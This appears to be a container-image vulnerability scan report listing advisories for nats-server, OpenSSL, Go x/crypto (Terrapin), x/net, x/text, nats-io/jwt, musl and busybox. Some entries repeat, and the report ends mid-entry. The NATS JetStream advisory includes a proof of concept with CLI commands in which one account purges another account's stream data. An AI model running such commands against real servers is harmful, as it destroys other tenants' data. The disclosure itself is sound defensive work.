# User b (account TEST2) sends a PURGE command for account TEST (user a). # According to the source comments, user b shouldn't even be able to purge it's own account, much less another one. $ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' '' 11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST" 11:54:50 Received with rtt 1.528042ms {"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}
# From nats-server in response to the purge request: [90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)
# And indeed, the stream data is gone on account TEST: $ du -h tmp/jetstream 0B tmp/jetstream
$ nats -s nats://localhost:4233 --user a --password a stream ls No Streams defined
Authentication Bypass by Primary Weakness
| Affected range | >=2.2.0 <2.9.23
| | Fixed version | 2.9.23 | | EPSS Score | 0.212% | | EPSS Percentile | 44th percentile |
Description
Background
NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.
NATS users exist within accounts, and once using accounts, the old authorization block is not applicable.
Problem Description
Without any authorization rules in the nats-server, users can connect without authentication.
Before nats-server 2.2.0, all authentication and authorization rules for a nats-server lived in an "authorization" block, defining users. With nats-server 2.2.0 all users live inside accounts. When using the authorization block, whose syntax predates this, those users will be placed into the implicit global account, "$G". Users inside accounts go into the newer "accounts" block.
If an "accounts" block is defined, in simple deployment scenarios this is often used only to enable client access to the system account. When the only account added is the system account "$SYS", the nats-server would create an implicit user in "$G" and set it as the no_auth_user account, enabling the same "without authentication" logic as without any rules.
This preserved the ability to connect simply, and then add one authenticated login for system access.
But with an "authorization" block, this is wrong. Users exist in the global account, with login rules. And in simple testing, they might still connect fine without administrators seeing that authentication has been disabled.
The blind-spot on our part came from encouraging and documenting a switch to using only "accounts", instead of "authorization".
In the fixed versions, using an "authorization" block will inhibit the implicit creation of a "$G" user and setting it as the no_auth_user target. In unfixed versions, just creating a second account, with no users, will also inhibit this behavior.
Affected versions
NATS Server:
- 2.2.0 up to and including 2.9.22 and 2.10.1
- Fixed with nats-io/nats-server: 2.10.2 and backported to 2.9.23
Workarounds
In the "accounts" block, define a second non-system account, leave it empty.
accounts { SYS: { users: [ { user: sysuser, password: makemeasandwich } ] } DUMMY: {} # for security, before 2.10.2 } system_account: SYS
Solution
Any one of these:
- Upgrade the NATS server to at least 2.10.2 (or 2.9.23)
- Or define a dummy account
- Or complete the migration of authorization entries to be inside a named account in the "accounts" block
Credits
Problem reported by Alex Herrington.
Addressed publicly in a GitHub Discussion prior to this advisory.
|
github.com/nats-io/nats-server/v2 2.9.0 (golang)
pkg:golang/github.com/nats-io/nats-server@2.9.0#v2
Improper Authorization
| Affected range | >=2.2.0 <2.10.27
| | Fixed version | 2.10.27 | | CVSS Score | 9.6 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H | | EPSS Score | 0.053% | | EPSS Percentile | 17th percentile |
Description
Advisory
The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.
Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.
Affected versions
NATS Server:
- Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27
Original Report
(Lightly edited to confirm some supposition and in the summary to use past tense)
Summary
nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.
In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.
Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.
Reproduction of the ACCOUNT.PURGE case is below. The others are like it.
Details & Impact
Issue 1: $JS.API.ACCOUNT.PURGE.*
Any user may perform an account purge of any other account (including their own).
Risk: total destruction of Jetstream configuration and data.
Issue 2: $JS.API.SERVER.REMOVE
Any user may remove servers from Jetstream clusters.
Risk: Loss of data redundancy, reduction of service quality.
Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE
Any user may cause streams to be moved between servers.
Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.
Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*
Mitigations
It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.
Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
Scope of impact
Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.
While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.
Additional notes
It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.
PoC
Environment
Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4
Reproduction steps
$ nats-server --version nats-server: v2.10.26
$ nats --version 0.1.6
$ cat nats-server.conf listen: '0.0.0.0:4233' jetstream: { store_dir: './tmp' } accounts: { '$SYS': { users: [{user: 'sys', password: 'sys'}] }, 'TEST': { jetstream: true, users: [{user: 'a', password: 'a'}] }, 'TEST2': { jetstream: true, users: [{user: 'b', password: 'b'}] } }
$ nats-server -c ./nats-server.conf ... [90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf ... [90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233 ...
# Authentication is effectively enabled by the server: $ nats -s nats://localhost:4233 account info nats: error: setup failed: nats: Authorization Violation
$ nats -s nats://localhost:4233 account info --user sys --password wrong nats: error: setup failed: nats: Authorization Violation
$ nats -s nats://localhost:4233 account info --user a --password wrong nats: error: setup failed: nats: Authorization Violation
$ nats -s nats://localhost:4233 account info --user b --password wrong nats: error: setup failed: nats: Authorization Violation
# Valid credentials work, and users properly matched to accounts: $ nats -s nats://localhost:4233 account info --user sys --password sys Account Information User: sys Account: $SYS ...
$ nats -s nats://localhost:4233 account info --user a --password a Account Information User: a Account: TEST ...
$ nats -s nats://localhost:4233 account info --user b --password b Account Information User: b Account: TEST2 ...
# Add a stream and messages to account TEST (user 'a'): $ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults Stream stream1 was created ...
$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg {{Count}}" 11:50:05 Published 5 bytes to "s1" 11:50:05 Published 5 bytes to "s1" 11:50:05 Published 5 bytes to "s1"
# Messages are correctly persisted on account TEST, and not on TEST2: $ nats -s nats://localhost:4233 --user a --password a stream ls ╭───────── ──────────────────────────────────────────────────────────────────────╮ │ Streams │ ├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤ │ Name │ Description │ Created │ Messages │ Size │ Last Message │ ├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤ │ stream1 │ │ 2025-03-02 11:48:49 │ 3 │ 111 B │ 46.01s │ ╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯
$ nats -s nats://localhost:4233 --user b --password b stream ls No Streams defined
$ du -h tmp/jetstream 0B tmp/jetstream/TEST/streams/stream1/obs 8.0K tmp/jetstream/TEST/streams/stream1/msgs 16K tmp/jetstream/TEST/streams/stream1 16K tmp/jetstream/TEST/streams 16K tmp/jetstream/TEST 16K tmp/jetstream
# User b (account TEST2) sends a PURGE command for account TEST (user a). # According to the source comments, user b shouldn't even be able to purge it's own account, much less another one. $ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' '' 11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST" 11:54:50 Received with rtt 1.528042ms {"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}
# From nats-server in response to the purge request: [90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)
# And indeed, the stream data is gone on account TEST: $ du -h tmp/jetstream 0B tmp/jetstream
$ nats -s nats://localhost:4233 --user a --password a stream ls No Streams defined
Authentication Bypass by Primary Weakness
| Affected range | >=2.2.0 <2.9.23
| | Fixed version | 2.9.23 | | EPSS Score | 0.212% | | EPSS Percentile | 44th percentile |
Description
Background
NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.
NATS users exist within accounts, and once using accounts, the old authorization block is not applicable.
Problem Description
Without any authorization rules in the nats-server, users can connect without authentication.
Before nats-server 2.2.0, all authentication and authorization rules for a nats-server lived in an "authorization" block, defining users. With nats-server 2.2.0 all users live inside accounts. When using the authorization block, whose syntax predates this, those users will be placed into the implicit global account, "$G". Users inside accounts go into the newer "accounts" block.
If an "accounts" block is defined, in simple deployment scenarios this is often used only to enable client access to the system account. When the only account added is the system account "$SYS", the nats-server would create an implicit user in "$G" and set it as the no_auth_user account, enabling the same "without authentication" logic as without any rules.
This preserved the ability to connect simply, and then add one authenticated login for system access.
But with an "authorization" block, this is wrong. Users exist in the global account, with login rules. And in simple testing, they might still connect fine without administrators seeing that authentication has been disabled.
The blind-spot on our part came from encouraging and documenting a switch to using only "accounts", instead of "authorization".
In the fixed versions, using an "authorization" block will inhibit the implicit creation of a "$G" user and setting it as the no_auth_user target. In unfixed versions, just creating a second account, with no users, will also inhibit this behavior.
Affected versions
NATS Server:
- 2.2.0 up to and including 2.9.22 and 2.10.1
- Fixed with nats-io/nats-server: 2.10.2 and backported to 2.9.23
Workarounds
In the "accounts" block, define a second non-system account, leave it empty.
accounts { SYS: { users: [ { user: sysuser, password: makemeasandwich } ] } DUMMY: {} # for security, before 2.10.2 } system_account: SYS
Solution
Any one of these:
- Upgrade the NATS server to at least 2.10.2 (or 2.9.23)
- Or define a dummy account
- Or complete the migration of authorization entries to be inside a named account in the "accounts" block
Credits
Problem reported by Alex Herrington.
Addressed publicly in a GitHub Discussion prior to this advisory.
|
openssl 1.1.1q-r0 (apk)
pkg:apk/alpine/openssl@1.1.1q-r0?os_name=alpine&os_version=3.16

| Affected range | <1.1.1t-r1 | | Fixed version | 1.1.1t-r1 | | EPSS Score | 0.857% | | EPSS Percentile | 74th percentile |
Description

| Affected range | <1.1.1t-r0 | | Fixed version | 1.1.1t-r0 | | EPSS Score | 88.474% | | EPSS Percentile | 99th percentile |
Description
There is a type confusion vulnerability relating to X.400 address processing
inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but
the public structure definition for GENERAL_NAME incorrectly specified the type
of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by
the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an
ASN1_STRING.
When CRL checking is enabled (i.e. the application sets the
X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass
arbitrary pointers to a memcmp call, enabling them to read memory contents or
enact a denial of service. In most cases, the attack requires the attacker to
provide both the certificate chain and CRL, neither of which need to have a
valid signature. If the attacker only controls one of these inputs, the other
input must already contain an X.400 address as a CRL distribution point, which
is uncommon. As such, this vulnerability is most likely to only affect
applications which have implemented their own functionality for retrieving CRLs
over a network.
OpenSSL versions 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zg (premium support customers
only).
This issue was reported on 11th January 2023 by David Benjamin (Google).
The fix was developed by Hugo Landau.

| Affected range | <1.1.1u-r0 | | Fixed version | 1.1.1u-r0 | | EPSS Score | 91.907% | | EPSS Percentile | 100th percentile |
Description

| Affected range | <1.1.1w-r1 | | Fixed version | 1.1.1w-r1 | | EPSS Score | 0.638% | | EPSS Percentile | 70th percentile |
Description

| Affected range | <1.1.1v-r0 | | Fixed version | 1.1.1v-r0 | | EPSS Score | 0.329% | | EPSS Percentile | 55th percentile |
Description

| Affected range | <1.1.1u-r2 | | Fixed version | 1.1.1u-r2 | | EPSS Score | 0.976% | | EPSS Percentile | 76th percentile |
Description

| Affected range | <1.1.1t-r2 | | Fixed version | 1.1.1t-r2 | | EPSS Score | 0.398% | | EPSS Percentile | 60th percentile |
Description

| Affected range | <1.1.1t-r0 | | Fixed version | 1.1.1t-r0 | | EPSS Score | 0.545% | | EPSS Percentile | 67th percentile |
Description
The public API function BIO_new_NDEF is a helper function used for streaming
ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the
SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by
end user applications.
The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter
BIO onto the front of it to form a BIO chain, and then returns the new head of
the BIO chain to the caller. Under certain conditions, for example if a CMS
recipient public key is invalid, the new filter BIO is freed and the function
returns a NULL result indicating a failure. However, in this case, the BIO chain
is not properly cleaned up and the BIO passed by the caller still retains
internal pointers to the previously freed filter BIO. If the caller then goes on
to call BIO_pop() on the BIO then a use-after-free will occur. This will most
likely result in a crash.
This scenario occurs directly in the internal function B64_write_ASN1() which
may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on
the BIO. This internal function is in turn called by the public API functions
PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream,
SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7.
Other public API functions that may be impacted by this include
i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and
i2d_PKCS7_bio_stream.
The OpenSSL cms and smime command line applications are similarly affected.
OpenSSL 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zg (premium support customers
only).
This issue was reported on 29th November 2022 by Octavio Galland and
Marcel Böhme (Max Planck Institute for Security and Privacy). The fix was
developed by Viktor Dukhovni and Matt Caswell.

| Affected range | <1.1.1t-r0 | | Fixed version | 1.1.1t-r0 | | EPSS Score | 0.140% | | EPSS Percentile | 35th percentile |
Description
The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and
decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data.
If the function succeeds then the "name_out", "header" and "data" arguments are
populated with pointers to buffers containing the relevant decoded data. The
caller is responsible for freeing those buffers. It is possible to construct a
PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex()
will return a failure code but will populate the header argument with a pointer
to a buffer that has already been freed. If the caller also frees this buffer
then a double free will occur. This will most likely lead to a crash. This
could be exploited by an attacker who has the ability to supply malicious PEM
files for parsing to achieve a denial of service attack.
The functions PEM_read_bio() and PEM_read() are simple wrappers around
PEM_read_bio_ex() and therefore these functions are also directly affected.
These functions are also called indirectly by a number of other OpenSSL
functions including PEM_X509_INFO_read_bio_ex() and
SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal
uses of these functions are not vulnerable because the caller does not free the
header argument if PEM_read_bio_ex() returns a failure code. These locations
include the PEM_read_bio_TYPE() functions as well as the decoders introduced in
OpenSSL 3.0.
The OpenSSL asn1parse command line application is also impacted by this issue.
OpenSSL 3.0 and 1.1.1 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 is not affected by this issue.
This issue was discovered by CarpetFuzz and reported on 8th December 2022 by
Dawei Wang. The fix was developed by Kurt Roeckx and Matt Caswell.

| Affected range | <1.1.1t-r0 | | Fixed version | 1.1.1t-r0 | | EPSS Score | 0.255% | | EPSS Percentile | 49th percentile |
Description
A timing based side channel exists in the OpenSSL RSA Decryption implementation
which could be sufficient to recover a plaintext across a network in a
Bleichenbacher style attack. To achieve a successful decryption an attacker
would have to be able to send a very large number of trial messages for
decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,
RSA-OEAP and RSASVE.
For example, in a TLS connection, RSA is commonly used by a client to send an
encrypted pre-master secret to the server. An attacker that had observed a
genuine connection between a client and a server could use this flaw to send
trial messages to the server and record the time taken to process them. After a
sufficiently large number of messages the attacker could recover the pre-master
secret used for the original connection and thus be able to decrypt the
application data sent over that connection.
OpenSSL 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zg (premium support customers
only).
An initial report of a possible timing side channel was made on 14th July 2020
by Hubert Kario (Red Hat). A refined report identifying a specific timing side
channel was made on 15th July 2022 by Hubert Kario.
The fix was developed by Dmitry Belyavsky (Red Hat) and Hubert Kario.
|
golang.org/x/crypto 0.0.0-20220315160706-3147a52a75dd (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220315160706-3147a52a75dd

| Affected range | <0.0.0-20220525230936-793ad666bf5e | | Fixed version | 0.0.0-20220525230936-793ad666bf5e | | EPSS Score | 0.247% | | EPSS Percentile | 48th percentile |
Description
httpTokenCacheKey uses path.Base to extract the expected HTTP-01 token value to lookup in the DirCache implementation. On Windows, path.Base acts differently to filepath.Base, since Windows uses a different path separator (\ vs. /), allowing a user to provide a relative path, i.e. .well-known/acme-challenge/....\asd becomes ....\asd. The extracted path is then suffixed with +http-01, joined with the cache directory, and opened.
Since the controlled path is suffixed with +http-01 before opening, the impact of this is significantly limited, since it only allows reading arbitrary files on the system if and only if they have this suffix.
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex" which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
golang.org/x/text 0.3.7 (golang)
pkg:golang/golang.org/x/text@0.3.7
Missing Release of Resource after Effective Lifetime
| Affected range | <0.3.8 | | Fixed version | 0.3.8 | | CVSS Score | 7.5 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | | EPSS Score | 0.054% | | EPSS Percentile | 17th percentile |
Description
The BCP 47 tag parser has quadratic time complexity due to inherent aspects of its design. Since the parser is, by design, exposed to untrusted user input, this can be leveraged to force a program to consume significant time parsing Accept-Language headers. The parser cannot be easily rewritten to fix this behavior for various reasons. Instead the solution implemented in this CL is to limit the total complexity of tags passed into ParseAcceptLanguage by limiting the number of dashes in the string to 1000. This should be more than enough for the majority of real world use cases, where the number of tags being sent is likely to be in the single digits.
Specific Go Packages Affected
golang.org/x/text/language
|
golang.org/x/net 0.0.0-20220906165146-f3363e06e74c (golang)
pkg:golang/golang.org/x/net@0.0.0-20220906165146-f3363e06e74c
Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| Affected range | >=0.0.0-20220524220425-1d687d428aca <0.1.1-0.20221104162952-702349b0e862
| | Fixed version | 0.1.1-0.20221104162952-702349b0e862 | | CVSS Score | 7.5 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | | EPSS Score | 0.074% | | EPSS Percentile | 23rd percentile |
Description
A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.
Specific Go Packages Affected
golang.org/x/net/http2/h2c
|
github.com/nats-io/jwt 1.2.3-0.20210314221642-a826c77dc9d2 (golang)
pkg:golang/github.com/nats-io/jwt@1.2.3-0.20210314221642-a826c77dc9d2
OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
| Affected range | <v2.0.1 | | Fixed version | v2.0.1 | | EPSS Score | 0.290% | | EPSS Percentile | 52nd percentile |
Description
The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT library's validation of the bindings in the Import Token incorrectly warned on mismatches, instead of outright rejecting the token. As a result, any account can take an Import token used by any other account and re-use it for themselves because the binding to the importing account is not rejected, and use it to import any Subject from the Exporting account, not just the Subject referenced in the Import Token. The NATS account-server system treats account JWTs as semi-public information, such that an attacker can easily enumerate all account JWTs and retrieve all Import Tokens from those account JWTs.
|
musl 1.2.3-r0 (apk)
pkg:apk/alpine/musl@1.2.3-r0?os_name=alpine&os_version=3.16

| Affected range | <1.2.3-r4 | | Fixed version | 1.2.3-r4 | | EPSS Score | 0.016% | | EPSS Percentile | 3rd percentile |
Description
|
golang.org/x/crypto 0.0.0-20220722155217-630584e8d5aa (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220722155217-630584e8d5aa
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex" which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
golang.org/x/crypto 0.0.0-20220926161630-eccd6366d1be (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220926161630-eccd6366d1be
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex" which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
busybox 1.35.0-r17 (apk)
pkg:apk/alpine/busybox@1.35.0-r17?os_name=alpine&os_version=3.16

| Affected range | <1.35.0-r18 | | Fixed version | 1.35.0-r18 | | EPSS Score | 0.024% | | EPSS Percentile | 6th percentile |
Description
|
golang.org/x/crypto 0.0.0-20220829220503-c86fa9a7ed90 (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220829220503-c86fa9a7ed90
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
